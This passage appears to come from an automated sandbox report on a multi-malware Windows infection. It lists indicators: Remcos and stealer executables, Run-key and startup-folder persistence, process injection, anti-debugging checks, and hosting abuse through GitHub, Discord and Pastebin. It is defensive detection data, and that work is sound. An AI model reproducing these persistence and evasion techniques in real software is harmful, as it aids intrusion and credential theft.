Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rascqn.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A

Checks installed software on the system

discovery

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A freegeoip.app N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A freegeoip.app N/A N/A
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\11.reg C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\rfusclient.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\MicrosoftProfile C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\libeay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\xda C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\rutserv.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\rutssvc64 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp C:\Windows\system32\lsass.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3676 set thread context of 4220 N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 2280 set thread context of 4396 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 2120 set thread context of 4580 N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
PID 5632 set thread context of 4540 N/A C:\ProgramData\Remcos\remcos.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 5280 set thread context of 1092 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
PID 460 set thread context of 5016 N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
PID 2920 set thread context of 5340 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 3824 set thread context of 5124 N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe C:\Windows\explorer.exe
PID 5156 set thread context of 3328 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 668 set thread context of 5480 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\lsass.exe
PID 2556 set thread context of 5648 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
PID 4956 set thread context of 6712 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 5132 set thread context of 6548 N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe C:\Windows\explorer.exe
PID 3788 set thread context of 6228 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
PID 4792 set thread context of 4916 N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe C:\Windows\explorer.exe
PID 6292 set thread context of 7936 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 756 set thread context of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\WerFault.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
